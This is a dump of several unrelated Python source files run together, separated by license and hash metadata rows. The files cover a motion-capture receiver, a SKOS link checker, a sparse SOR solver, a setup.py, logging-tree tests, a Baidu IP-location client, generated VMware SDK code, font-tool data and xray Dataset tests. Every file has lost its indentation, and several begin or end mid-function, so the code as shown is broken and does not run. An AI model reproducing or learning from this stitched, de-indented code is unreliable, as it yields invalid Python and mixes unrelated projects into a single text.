def _identify_rigid_bodies(self, sets, bodies):
"""Compare marker positions to associate a named marker set with a rigid body.
:param sets: dictionary of lists of marker coordinate triples
:param bodies: list of rigid bodies
:return: dictionary mapping body ID numbers to body name
Some of the relevant fields:
bodies[].markers is a list of marker coordinate triples
bodies[].id is an integer body identifier with the User Data field specified for the body in Motive
"""
# for now, do a simple direct comparison on a single marker on each body
mapping = dict()
for body in bodies:
marker1 = body.markers[0]
try:
for name,markerset in sets.items():
if name != 'all':
for marker in markerset:
if self._markers_coincide(marker1, marker):
mapping[body.id] = name
raise StopIteration
except StopIteration:
pass
return mapping
#================================================================
def poll(self):
"""Poll the mocap receiver port and return True if new data is available."""
try:
data = self.receiver.recv(optirx.MAX_PACKETSIZE)
except:
return False
packet = optirx.unpack(data, version=self.sdk_version)
if type(packet) is optirx.SenderData:
version = packet.natnet_version
print "NatNet version received:", version
elif type(packet) is optirx.FrameOfData:
nbodies = len(packet.rigid_bodies)
# print "Received frame data with %d rigid bodies." % nbodies
# print "Received FrameOfData with sets:", packet.sets
# There appears to be one marker set per rigid body plus 'all'.
# print "Received FrameOfData with names:", packet.sets.keys()
# print "First marker of first marker set:", packet.sets.values()[0][0]
# print "Received FrameOfData with rigid body IDs:", [body.id for body in packet.rigid_bodies]
# print "First marker of first rigid body:", packet.rigid_bodies[0].markers[0]
# print "First tracking flag of first rigid body:", packet.rigid_bodies[0].tracking_valid
# compare markers to associate the numbered rigid bodies with the named marker sets
mapping = self._identify_rigid_bodies( packet.sets, packet.rigid_bodies)
# print "Body identification:", mapping
if nbodies > 0:
# print packet.rigid_bodies[0]
# rotate the coordinates into Rhino conventions and save them in the object instance as Python lists
self.positions = [ rotated_point(body.position) if body.tracking_valid else None for body in packet.rigid_bodies]
self.rotations = [ rotated_orientation(body.orientation) for body in packet.rigid_bodies]
self.bodynames = [ mapping.get(body.id, '<Missing>') for body in packet.rigid_bodies]
# return a new data indication
return True
elif type(packet) is optirx.ModelDefs:
print "Received ModelDefs:", packet
else:
print "Received unhandled NatNet packet type:", packet
# else return a null result
return False
#================================================================
def frames_to_tree(frame_list):
"""Utility function to convert a list of list of Plane objects representing a trajectory segment into a GH data tree."""
# Transpose the frame list for output. As accumulated, it is a list of lists:
# [[body1_sample0, body2_sample0, body3_sample0, ...], [body1_sample1, body2_sample1, body3_sample1, ...], ...]
segment = zip(*frame_list)
# Convert a Python list-of-lists into a data tree. Segment is a list of trajectories:
# [[body1_sample0, body1_sample1, body1_sample2, ...], [body2_sample0, body2_sample1, body2_sample2, ...], ...]
return list_to_tree(segment)
#================================================================
| bsd-3-clause | 5,983,820,118,657,110,000 | 46.955696 | 131 | 0.60776 | false |
KarlPineau/patrimeph | lookForErrors.py | 1 | 1377 | import re
import math
import json
import operator
from collections import Counter
import collections
import xml.etree.ElementTree as ET
import urllib.request
import urllib.parse
tree = ET.parse('workingDirectory/skos.rdf')
root = tree.getroot()
namespaces = {"skos": "http://www.w3.org/2004/02/skos/core#",
"xml": "http://www.w3.org/XML/1998/namespace",
"rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#"}
arrayNamespace = []
arrayFalse = []
for preConcept in root.findall('.//skos:Concept', namespaces):
for preAttrib in preConcept.attrib:
arrayNamespace.append(preConcept.attrib[preAttrib])
for broader in root.findall('.//skos:broader', namespaces):
for attrib in broader.attrib:
if broader.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > broader > "+broader.attrib[attrib])
for narrower in root.findall('.//skos:narrower', namespaces):
for attrib in narrower.attrib:
if narrower.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > narrower > "+narrower.attrib[attrib])
for related in root.findall('.//skos:related', namespaces):
for attrib in related.attrib:
if related.attrib[attrib] not in arrayNamespace:
arrayFalse.append(" > related > "+related.attrib[attrib])
# print(arrayNamespace)
for error in arrayFalse:
print(error)
| mit | 9,186,682,194,282,567,000 | 32.585366 | 71 | 0.694989 | false |
sri13/nas_sor_code | implementSOR.py | 1 | 4374 | # -*- coding: utf-8 -*-
"""
"""
import numpy as np
def get_euclid_norm(matrix):
"""
this function accepts one vector
the calling function should compute this vector as the difference of two vectors
the standard Euclidean distance formula sqrt(x1^2+x2^2+....+xn^2) is applied
"""
sum = 0
for each_val in matrix:
sum+=each_val**2
return np.sqrt(sum)
def get_residual(A, x, b):
"""
return the residual error Ax-b for an approximation of x
input parameters should be numpy arrays
this is not as simple as using numpy.dot because A is in CSR format
"""
adotx = []
for i in range(0,len(b)):
adotx.append(0.0)
#i should really do a DOT function instead of coding it explicitly here and in SOR also
for j in range (0, len(b)):
first_nz = A[1][(A[2][j]-1)] - 1 #pos of first non zero on row
for k in range(A[2][j]-1, A[2][j+1]-1):
adotx[j] = adotx[j] + A[0][k] * x[k - (A[2][j]-1) + first_nz]
return get_euclid_norm(np.subtract(adotx, b))
def get_x_seq(xold, xnew):
"""
this function computes Euclidean distance between successive iterations of x
input parameters should be numpy arrays
"""
return get_euclid_norm(np.subtract(xnew, xold))
def chk_diverge(xold, xnew, A, b):
"""
check if previous approx of x was closer than new approx of x
"""
dist_old = get_residual(A, xold, b)
dist_new = get_residual(A, xnew, b)
if dist_old < dist_new:
return True
else:
return False
def chk_converge(A, xnew, b, xold, x_seq_tol, res_tol, flag):
#checks both residual and x_seq for convergence
if flag == True:
return -1 #required to enter sparse_sor loop
elif get_residual(A, xnew, b) < res_tol:
return 2 #dict value for this stopping reason
elif get_x_seq(xold, xnew) < x_seq_tol:
return 1
elif chk_diverge(xold, xnew, A, b) == True:
return 4
return -1
def sparse_sor(matrix_a, vector_b, matrix_x, dimension_n, max_it=50, \
x_tol=1e-13, res_tol=1e-13, w=1.25 ):
num_it = 1
stop_reason = 6 #something has gone wrong if this does not get overwritten later
matrix_x_last_it = np.array([0.0])
matrix_x_new = np.array(matrix_x)
matrix_a_np = np.array(matrix_a)
vector_b_np = np.array(vector_b)
flag = True #required to enter while loop first time only
while num_it <= max_it and \
chk_converge(matrix_a_np, matrix_x_new, vector_b_np, matrix_x_last_it,
x_tol, res_tol, flag) == -1:
flag = False
matrix_x_last_it = np.array(matrix_x_new[:])
for i in range(0,len(vector_b)):
sum = 0
first_nz = matrix_a_np[1][(matrix_a_np[2][i]-1)] - 1 #pos of first non zero on row
for j in range(matrix_a_np[2][i]-1, matrix_a_np[2][i+1]-1):
sum = sum + matrix_a_np[0][j] * matrix_x_new[j - \
(matrix_a_np[2][i]-1) + first_nz]
if matrix_a_np[1][j] == i+1:
d = matrix_a[0][j]
matrix_x_new[i] = matrix_x_new[i] + w * (vector_b_np[i] - sum) / d
num_it+=1
conv = chk_converge(matrix_a_np, matrix_x_new, vector_b_np, matrix_x_last_it, \
x_tol, res_tol, False)
if num_it-1 == max_it:
stop_reason = 3
elif conv != -1:
stop_reason = conv
# processIO.output(err.args[1], max_it, num_it, x_tol, res_tol, matrix_x, output_filename,err.args[0])
# set_output(stop_reason, max_it, num_it-1, x_tol, res_tol,matrix_x_new, )
return (stop_reason, max_it, num_it-1, matrix_x_new )
def dense_SOR(matrix_a,vector_b,dimension_n,max_iteration,w,matrix_x):
print("Dense SOR Calculation")
it_counter=0
while(it_counter<=max_iteration):
for row_counter in range(dimension_n):
sum=0.0
for col_counter in range(dimension_n):
sum = sum + matrix_a[row_counter,col_counter]*matrix_x[col_counter]
matrix_x[row_counter]=matrix_x[row_counter]+w*(vector_b[row_counter]-sum) \
/matrix_a[row_counter,row_counter]
# print("Iteration: ",it_counter,"\n","X:",matrix_x)
it_counter+=1
return
| gpl-3.0 | -6,432,232,432,044,914,000 | 36.067797 | 116 | 0.568587 | false |
lebinh/ministat | setup.py | 1 | 2736 | # Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='ministat',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.0.2',
description='A mini statistics library for Python inspired by the `ministat` command',
long_description=long_description,
# The project's main homepage.
url='https://github.com/lebinh/ministat',
# Author details
author='Binh Le',
author_email='[email protected]',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='ministat statistic',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'dev': [],
'test': [],
},
) | mit | 5,320,854,888,845,466,000 | 33.2125 | 90 | 0.652778 | false |
FedericoCeratto/debian-python-logging-tree | logging_tree/tests/test_format.py | 1 | 5711 | """Tests for the `logging_tree.format` module."""
import logging
import logging.handlers
import unittest
import sys
from logging_tree.format import build_description, printout
from logging_tree.tests.case import LoggingTestCase
if sys.version_info >= (3,):
from io import StringIO
else:
from StringIO import StringIO
class FakeFile(StringIO):
def __init__(self, filename, mode, encoding=None):
self.filename = filename
StringIO.__init__(self)
def __repr__(self):
return '<file %r>' % self.filename
def fileno(self):
return 0
class FormatTests(LoggingTestCase):
def setUp(self):
# Prevent logging file handlers from trying to open real files.
# (The keyword delay=1, which defers any actual attempt to open
# a file, did not appear until Python 2.6.)
logging.open = FakeFile
super(FormatTests, self).setUp()
def tearDown(self):
del logging.open
super(FormatTests, self).tearDown()
def test_printout(self):
stdout, sys.stdout = sys.stdout, StringIO()
printout()
self.assertEqual(sys.stdout.getvalue(), '<--""\n Level WARNING\n')
sys.stdout = stdout
def test_simple_tree(self):
logging.getLogger('a')
logging.getLogger('a.b').setLevel(logging.DEBUG)
logging.getLogger('x.c')
self.assertEqual(build_description(), '''\
<--""
Level WARNING
|
o<--"a"
| Level NOTSET so inherits level WARNING
| |
| o<--"a.b"
| Level DEBUG
|
o<--[x]
|
o<--"x.c"
Level NOTSET so inherits level WARNING
''')
def test_fancy_tree(self):
logging.getLogger('').setLevel(logging.DEBUG)
log = logging.getLogger('db')
log.setLevel(logging.INFO)
log.propagate = False
log.disabled = 1
log.addFilter(MyFilter())
handler = logging.StreamHandler()
log.addHandler(handler)
handler.addFilter(logging.Filter('db.errors'))
logging.getLogger('db.errors')
logging.getLogger('db.stats')
log = logging.getLogger('www.status')
log.setLevel(logging.DEBUG)
log.addHandler(logging.FileHandler('/foo/log.txt'))
log.addHandler(MyHandler())
self.assertEqual(build_description(), '''\
<--""
Level DEBUG
|
o "db"
| Level INFO
| Propagate OFF
| Disabled
| Filter <MyFilter>
| Handler Stream %r
| Filter name='db.errors'
| |
| o<--"db.errors"
| | Level NOTSET so inherits level INFO
| |
| o<--"db.stats"
| Level NOTSET so inherits level INFO
|
o<--[www]
|
o<--"www.status"
Level DEBUG
Handler File '/foo/log.txt'
Handler <MyHandler>
''' % (sys.stderr,))
def test_most_handlers(self):
ah = logging.getLogger('').addHandler
ah(logging.handlers.RotatingFileHandler(
'/bar/one.txt', maxBytes=10000, backupCount=3))
ah(logging.handlers.SocketHandler('server.example.com', 514))
ah(logging.handlers.DatagramHandler('server.example.com', 1958))
ah(logging.handlers.SysLogHandler())
ah(logging.handlers.SMTPHandler(
'mail.example.com', 'Server', 'Sysadmin', 'Logs!'))
# ah(logging.handlers.NTEventLogHandler())
ah(logging.handlers.HTTPHandler('api.example.com', '/logs', 'POST'))
ah(logging.handlers.BufferingHandler(20000))
sh = logging.StreamHandler()
ah(logging.handlers.MemoryHandler(30000, target=sh))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler RotatingFile '/bar/one.txt' maxBytes=10000 backupCount=3
Handler Socket server.example.com 514
Handler Datagram server.example.com 1958
Handler SysLog ('localhost', 514) facility=1
Handler SMTP via mail.example.com to ['Sysadmin']
Handler HTTP POST to http://api.example.com//logs
Handler Buffering capacity=20000
Handler Memory capacity=30000 dumping to:
Handler Stream %r
''' % (sh.stream,))
logging.getLogger('').handlers[3].socket.close() # or Python 3 warning
def test_2_dot_5_handlers(self):
if sys.version_info < (2, 5):
return
ah = logging.getLogger('').addHandler
ah(logging.handlers.TimedRotatingFileHandler('/bar/two.txt'))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler TimedRotatingFile '/bar/two.txt' when='H' interval=3600 backupCount=0
''')
def test_2_dot_6_handlers(self):
if sys.version_info < (2, 6):
return
ah = logging.getLogger('').addHandler
ah(logging.handlers.WatchedFileHandler('/bar/three.txt'))
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler WatchedFile '/bar/three.txt'
''')
def test_nested_handlers(self):
h1 = logging.StreamHandler()
h2 = logging.handlers.MemoryHandler(30000, target=h1)
h2.addFilter(logging.Filter('worse'))
h3 = logging.handlers.MemoryHandler(30000, target=h2)
h3.addFilter(logging.Filter('bad'))
logging.getLogger('').addHandler(h3)
self.assertEqual(build_description(), '''\
<--""
Level WARNING
Handler Memory capacity=30000 dumping to:
Filter name='bad'
Handler Memory capacity=30000 dumping to:
Filter name='worse'
Handler Stream %r
''' % (h1.stream,))
class MyFilter(object):
def __repr__(self):
return '<MyFilter>'
class MyHandler(object):
def __repr__(self):
return '<MyHandler>'
if __name__ == '__main__': # for Python <= 2.4
unittest.main()
| bsd-2-clause | -7,244,357,543,753,971,000 | 27.989848 | 80 | 0.614778 | false |
hunter007/baidupy | baidu/api/iplocation.py | 1 | 1068 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from baidu.api.base import BaseAPI
class IPLocationAPI(BaseAPI):
scope = 'location'
version = ''
def get_location_info(self, ip='', coor=''):
"""
获取 IP 对应的位置信息
1.获取指定IP的位置信息:指定IP值,返回该IP对应的位置信息;
2.获取当前设备IP的地址信息:根据用户设备当前的IP返回位置信息;
:param ip: ip不出现,或者出现且为空字符串的情况下,
会使用当前访问者的IP地址作为定位参数
:param coor: coor不出现时,默认为百度墨卡托坐标;
coor="bd09ll"时,返回为百度经纬度坐标
..tips: coor="bd09ll"时,即其它接口中描述的 coor_type=3。
"""
params = {}
if ip:
params['ip'] = ip
if coor:
if str(coor).lower() == 'bd09ll':
params['coor'] = 'bd09ll'
return self.get('/ip', params=params)
| mit | -3,485,742,135,887,327,700 | 26.310345 | 53 | 0.541667 | false |
xuru/pyvisdk | pyvisdk/do/compute_resource_config_info.py | 1 | 1074 |
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def ComputeResourceConfigInfo(vim, *args, **kwargs):
'''Configuration of the compute resource; applies to both standalone hosts and
clusters.'''
obj = vim.client.factory.create('ns0:ComputeResourceConfigInfo')
# do some validation checking...
if (len(args) + len(kwargs)) < 1:
raise IndexError('Expected at least 2 arguments got: %d' % len(args))
required = [ 'vmSwapPlacement' ]
optional = [ 'spbmEnabled', 'dynamicProperty', 'dynamicType' ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
| mit | -5,653,184,942,584,587,000 | 30.617647 | 124 | 0.608939 | false |
typemytype/RoboFontExtensions | ramsaySt/RamsaySt.roboFontExt/lib/ramsayStData.py | 1 | 3963 | from AppKit import NSColor, NSObject
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
_baseDefaultKey = "com.typemytype.ramsaySt"
_fillColorDefaultKey = "%s.fillColor" % _baseDefaultKey
_strokeColorDefaultKey = "%s.strokeColor" %_baseDefaultKey
_showPreviewDefaultKey = "%s.showPreview" %_baseDefaultKey
_dataDefaultKey = "%s.data" % _baseDefaultKey
class RamsayStDataItem(NSObject):
def __new__(cls, *args, **kwargs):
return cls.alloc().init()
def __init__(self, glyphName, value):
self._glyphName = glyphName
self._value = list(value)
def getRamsaySt(self):
return self._value
def glyphName(self):
return self._glyphName
def setGlyphName_(self, value):
if value is None:
return
self._glyphName = value
def left(self):
return self._value[0]
def setLeft_(self, value):
if value is None:
value = " "
self._value[0] = value
def right(self):
return self._value[1]
def setRight_(self, value):
if value is None:
value = " "
self._value[1] = value
class RamsayStDataCollection(object):
_fallBackFillColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(.34, .54, .92, .7)
_fallBackStrokeColor = NSColor.blackColor()
_fallbackData = {'-': ('n', 'H'), 'A': ('H', 'V'), 'C': ('c', 'G'), 'B': ('P', 'D'), 'E': ('B', 'F'), 'D': ('B', 'P'), 'G': ('C', 'O'), 'F': ('P', 'E'), 'I': ('J', 'H'), 'H': ('I', 'P'), 'K': ('k', 'I'), 'J': ('j', 'I'), 'M': ('H', 'N'), 'L': ('I', 'H'), 'O': ('C', 'o'), 'N': ('M', 'V'), 'Q': ('O', 'G'), 'P': ('R', 'p'), 'S': ('C', 's'), 'R': ('B', 'P'), 'U': ('u', 'H'), 'T': ('I', 'H'), 'W': ('w', 'V'), 'V': ('v', 'W'), 'Y': ('y', 'V'), 'X': ('x', 'Y'), 'Z': ('z', 'X'), 'a': ('n', 'e'), 'c': ('e', 'C'), 'b': ('d', 'p'), 'e': ('o', 'c'), 'd': ('q', 'b'), 'g': ('o', 'q'), 'f': ('i', 't'), 'i': ('period', 'j'), 'h': ('l', 'n'), 'k': ('h', 'K'), 'j': ('i', 'period'), 'm': ('n', 'w'), 'l': ('h', 'k'), 'o': ('c', 'O'), 'n': ('h', 'm'), 'q': ('d', 'p'), 'p': ('q', 'P'), 's': ('e', 'S'), 'r': ('s', 'n'), 'u': ('v', 'n'), 't': ('s', 'f'), 'w': ('v', 'W'), 'v': ('u', 'w'), 'y': ('v', 'Y'), 'x': ('y', 'X'), 'z': ('x', 'Z')}
_fallbackShowPreview = True
def __init__(self):
self.load()
def load(self):
self.fillColor = getExtensionDefaultColor(_fillColorDefaultKey, self._fallBackFillColor)
self.strokeColor = getExtensionDefaultColor(_strokeColorDefaultKey, self._fallBackStrokeColor)
self.showPreview = getExtensionDefault(_showPreviewDefaultKey, self._fallbackShowPreview)
self.data = getExtensionDefault(_dataDefaultKey, self._fallbackData)
def save(self):
setExtensionDefaultColor(_fillColorDefaultKey, self.fillColor)
setExtensionDefaultColor(_strokeColorDefaultKey, self.strokeColor)
setExtensionDefault(_showPreviewDefaultKey, self.showPreview)
setExtensionDefault(_dataDefaultKey, self.data)
def keys(self):
return self.data.keys()
def __contains__(self, key):
return key in self.data
def get(self, value, fallback=("n", "n")):
return self.data.get(value, fallback)
def set(self, item):
key = item.glyphName()
if key is None:
return
self.data[key] = item.getRamsaySt()
def setItems(self, data):
self.data = dict()
for item in data:
self.data[item.glyphName()] = item.getRamsaySt()
self.save()
def getItems(self):
keys = list(self.data.keys())
keys.sort()
return [RamsayStDataItem(key, self.data[key]) for key in keys]
def newItem(self, glyphName):
return RamsayStDataItem(glyphName, (" ", " "))
RamsayStData = RamsayStDataCollection() | mit | 6,503,598,902,005,581,000 | 39.865979 | 931 | 0.533434 | false |
cpaulik/xray | xray/test/test_dataset.py | 1 | 86929 | from copy import copy, deepcopy
from textwrap import dedent
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import dask.array as da
except ImportError:
pass
import numpy as np
import pandas as pd
from xray import (align, concat, conventions, backends, Dataset, DataArray,
Variable, Coordinate, auto_combine, open_dataset,
set_options)
from xray.core import indexing, utils
from xray.core.pycompat import iteritems, OrderedDict
from . import (TestCase, unittest, InaccessibleArray, UnexpectedDataAccess,
requires_dask)
def create_test_data(seed=None):
rs = np.random.RandomState(seed)
_vars = {'var1': ['dim1', 'dim2'],
'var2': ['dim1', 'dim2'],
'var3': ['dim3', 'dim1']}
_dims = {'dim1': 8, 'dim2': 9, 'dim3': 10}
obj = Dataset()
obj['time'] = ('time', pd.date_range('2000-01-01', periods=20))
obj['dim1'] = ('dim1', np.arange(_dims['dim1'], dtype='int64'))
obj['dim2'] = ('dim2', 0.5 * np.arange(_dims['dim2']))
obj['dim3'] = ('dim3', list('abcdefghij'))
for v, dims in sorted(_vars.items()):
data = rs.normal(size=tuple(_dims[d] for d in dims))
obj[v] = (dims, data, {'foo': 'variable'})
obj.coords['numbers'] = ('dim3', np.array([0, 1, 2, 0, 0, 1, 1, 2, 2, 3],
dtype='int64'))
return obj
class InaccessibleVariableDataStore(backends.InMemoryDataStore):
def get_variables(self):
def lazy_inaccessible(x):
data = indexing.LazilyIndexedArray(InaccessibleArray(x.values))
return Variable(x.dims, data, x.attrs)
return dict((k, lazy_inaccessible(v)) for
k, v in iteritems(self._variables))
class TestDataset(TestCase):
def test_repr(self):
data = create_test_data(seed=123)
data.attrs['foo'] = 'bar'
# need to insert str dtype at runtime to handle both Python 2 & 3
expected = dedent("""\
<xray.Dataset>
Dimensions: (dim1: 8, dim2: 9, dim3: 10, time: 20)
Coordinates:
* time (time) datetime64[ns] 2000-01-01 2000-01-02 2000-01-03 ...
* dim1 (dim1) int64 0 1 2 3 4 5 6 7
* dim2 (dim2) float64 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0
* dim3 (dim3) %s 'a' 'b' 'c' 'd' 'e' 'f' 'g' 'h' 'i' 'j'
numbers (dim3) int64 0 1 2 0 0 1 1 2 2 3
Data variables:
var1 (dim1, dim2) float64 -1.086 0.9973 0.283 -1.506 -0.5786 1.651 ...
var2 (dim1, dim2) float64 1.162 -1.097 -2.123 1.04 -0.4034 -0.126 ...
var3 (dim3, dim1) float64 0.5565 -0.2121 0.4563 1.545 -0.2397 0.1433 ...
Attributes:
foo: bar""") % data['dim3'].dtype
actual = '\n'.join(x.rstrip() for x in repr(data).split('\n'))
print(actual)
self.assertEqual(expected, actual)
with set_options(display_width=100):
max_len = max(map(len, repr(data).split('\n')))
assert 90 < max_len < 100
expected = dedent("""\
<xray.Dataset>
Dimensions: ()
Coordinates:
*empty*
Data variables:
*empty*""")
actual = '\n'.join(x.rstrip() for x in repr(Dataset()).split('\n'))
print(actual)
self.assertEqual(expected, actual)
# verify that ... doesn't appear for scalar coordinates
data = Dataset({'foo': ('x', np.ones(10))}).mean()
expected = dedent("""\
<xray.Dataset>
Dimensions: ()
Coordinates:
*empty*
Data variables:
foo float64 1.0""")
actual = '\n'.join(x.rstrip() for x in repr(data).split('\n'))
print(actual)
self.assertEqual(expected, actual)
# verify long attributes are truncated
data = Dataset(attrs={'foo': 'bar' * 1000})
self.assertTrue(len(repr(data)) < 1000)
def test_constructor(self):
x1 = ('x', 2 * np.arange(100))
x2 = ('x', np.arange(1000))
z = (['x', 'y'], np.arange(1000).reshape(100, 10))
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
Dataset({'a': x1, 'b': x2})
with self.assertRaisesRegexp(ValueError, 'must be defined with 1-d'):
Dataset({'a': x1, 'x': z})
with self.assertRaisesRegexp(TypeError, 'must be an array or'):
Dataset({'x': (1, 2, 3, 4, 5, 6, 7)})
with self.assertRaisesRegexp(ValueError, 'already exists as a scalar'):
Dataset({'x': 0, 'y': ('x', [1, 2, 3])})
# verify handling of DataArrays
expected = Dataset({'x': x1, 'z': z})
actual = Dataset({'z': expected['z']})
self.assertDatasetIdentical(expected, actual)
def test_constructor_1d(self):
expected = Dataset({'x': (['x'], 5.0 + np.arange(5))})
actual = Dataset({'x': 5.0 + np.arange(5)})
self.assertDatasetIdentical(expected, actual)
actual = Dataset({'x': [5, 6, 7, 8, 9]})
self.assertDatasetIdentical(expected, actual)
def test_constructor_0d(self):
expected = Dataset({'x': ([], 1)})
for arg in [1, np.array(1), expected['x']]:
actual = Dataset({'x': arg})
self.assertDatasetIdentical(expected, actual)
d = pd.Timestamp('2000-01-01T12')
args = [True, None, 3.4, np.nan, 'hello', u'uni', b'raw',
np.datetime64('2000-01-01T00'), d, d.to_datetime()]
for arg in args:
print(arg)
expected = Dataset({'x': ([], arg)})
actual = Dataset({'x': arg})
self.assertDatasetIdentical(expected, actual)
def test_constructor_auto_align(self):
a = DataArray([1, 2], [('x', [0, 1])])
b = DataArray([3, 4], [('x', [1, 2])])
# verify align uses outer join
expected = Dataset({'a': ('x', [1, 2, np.nan]),
'b': ('x', [np.nan, 3, 4])})
actual = Dataset({'a': a, 'b': b})
self.assertDatasetIdentical(expected, actual)
# regression test for GH346
self.assertIsInstance(actual.variables['x'], Coordinate)
# variable with different dimensions
c = ('y', [3, 4])
expected2 = expected.merge({'c': c})
actual = Dataset({'a': a, 'b': b, 'c': c})
self.assertDatasetIdentical(expected2, actual)
# variable that is only aligned against the aligned variables
d = ('x', [3, 2, 1])
expected3 = expected.merge({'d': d})
actual = Dataset({'a': a, 'b': b, 'd': d})
self.assertDatasetIdentical(expected3, actual)
e = ('x', [0, 0])
with self.assertRaisesRegexp(ValueError, 'conflicting sizes'):
Dataset({'a': a, 'b': b, 'e': e})
def test_constructor_compat(self):
data = OrderedDict([('x', DataArray(0, coords={'y': 1})),
('y', ('z', [1, 1, 1]))])
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
Dataset(data, compat='equals')
expected = Dataset({'x': 0}, {'y': ('z', [1, 1, 1])})
actual = Dataset(data)
self.assertDatasetIdentical(expected, actual)
actual = Dataset(data, compat='broadcast_equals')
self.assertDatasetIdentical(expected, actual)
data = OrderedDict([('y', ('z', [1, 1, 1])),
('x', DataArray(0, coords={'y': 1}))])
actual = Dataset(data)
self.assertDatasetIdentical(expected, actual)
original = Dataset({'a': (('x', 'y'), np.ones((2, 3)))},
{'c': (('x', 'y'), np.zeros((2, 3)))})
expected = Dataset({'a': ('x', np.ones(2)),
'b': ('y', np.ones(3))},
{'c': (('x', 'y'), np.zeros((2, 3)))})
# use an OrderedDict to ensure test results are reproducible; otherwise
# the order of appearance of x and y matters for the order of
# dimensions in 'c'
actual = Dataset(OrderedDict([('a', original['a'][:, 0].drop('y')),
('b', original['a'][0].drop('x'))]))
self.assertDatasetIdentical(expected, actual)
data = {'x': DataArray(0, coords={'y': 3}), 'y': ('z', [1, 1, 1])}
with self.assertRaisesRegexp(ValueError, 'conflicting value'):
Dataset(data)
data = {'x': DataArray(0, coords={'y': 1}), 'y': [1, 1]}
actual = Dataset(data)
expected = Dataset({'x': 0}, {'y': [1, 1]})
self.assertDatasetIdentical(expected, actual)
def test_constructor_with_coords(self):
with self.assertRaisesRegexp(ValueError, 'redundant variables and co'):
Dataset({'a': ('x', [1])}, {'a': ('x', [1])})
ds = Dataset({}, {'a': ('x', [1])})
self.assertFalse(ds.data_vars)
self.assertItemsEqual(ds.coords.keys(), ['x', 'a'])
def test_properties(self):
ds = create_test_data()
self.assertEqual(ds.dims,
{'dim1': 8, 'dim2': 9, 'dim3': 10, 'time': 20})
self.assertItemsEqual(ds, list(ds.variables))
self.assertItemsEqual(ds.keys(), list(ds.variables))
self.assertNotIn('aasldfjalskdfj', ds.variables)
self.assertIn('dim1', repr(ds.variables))
self.assertEqual(len(ds), 8)
self.assertItemsEqual(ds.data_vars, ['var1', 'var2', 'var3'])
self.assertItemsEqual(ds.data_vars.keys(), ['var1', 'var2', 'var3'])
self.assertIn('var1', ds.data_vars)
self.assertNotIn('dim1', ds.data_vars)
self.assertNotIn('numbers', ds.data_vars)
self.assertEqual(len(ds.data_vars), 3)
self.assertItemsEqual(ds.indexes, ['dim1', 'dim2', 'dim3', 'time'])
self.assertEqual(len(ds.indexes), 4)
self.assertIn('dim1', repr(ds.indexes))
self.assertItemsEqual(ds.coords,
['time', 'dim1', 'dim2', 'dim3', 'numbers'])
self.assertIn('dim1', ds.coords)
self.assertIn('numbers', ds.coords)
self.assertNotIn('var1', ds.coords)
self.assertEqual(len(ds.coords), 5)
self.assertEqual(Dataset({'x': np.int64(1),
'y': np.float32([1, 2])}).nbytes, 16)
def test_attr_access(self):
ds = Dataset({'tmin': ('x', [42], {'units': 'Celcius'})},
attrs={'title': 'My test data'})
self.assertDataArrayIdentical(ds.tmin, ds['tmin'])
self.assertDataArrayIdentical(ds.tmin.x, ds.x)
self.assertEqual(ds.title, ds.attrs['title'])
self.assertEqual(ds.tmin.units, ds['tmin'].attrs['units'])
self.assertLessEqual(set(['tmin', 'title']), set(dir(ds)))
self.assertIn('units', set(dir(ds.tmin)))
# should defer to variable of same name
ds.attrs['tmin'] = -999
self.assertEqual(ds.attrs['tmin'], -999)
self.assertDataArrayIdentical(ds.tmin, ds['tmin'])
def test_variable(self):
a = Dataset()
d = np.random.random((10, 3))
a['foo'] = (('time', 'x',), d)
self.assertTrue('foo' in a.variables)
self.assertTrue('foo' in a)
a['bar'] = (('time', 'x',), d)
# order of creation is preserved
self.assertEqual(list(a), ['foo', 'time', 'x', 'bar'])
self.assertTrue(all([a['foo'][i].values == d[i]
for i in np.ndindex(*d.shape)]))
# try to add variable with dim (10,3) with data that's (3,10)
with self.assertRaises(ValueError):
a['qux'] = (('time', 'x'), d.T)
def test_modify_inplace(self):
a = Dataset()
vec = np.random.random((10,))
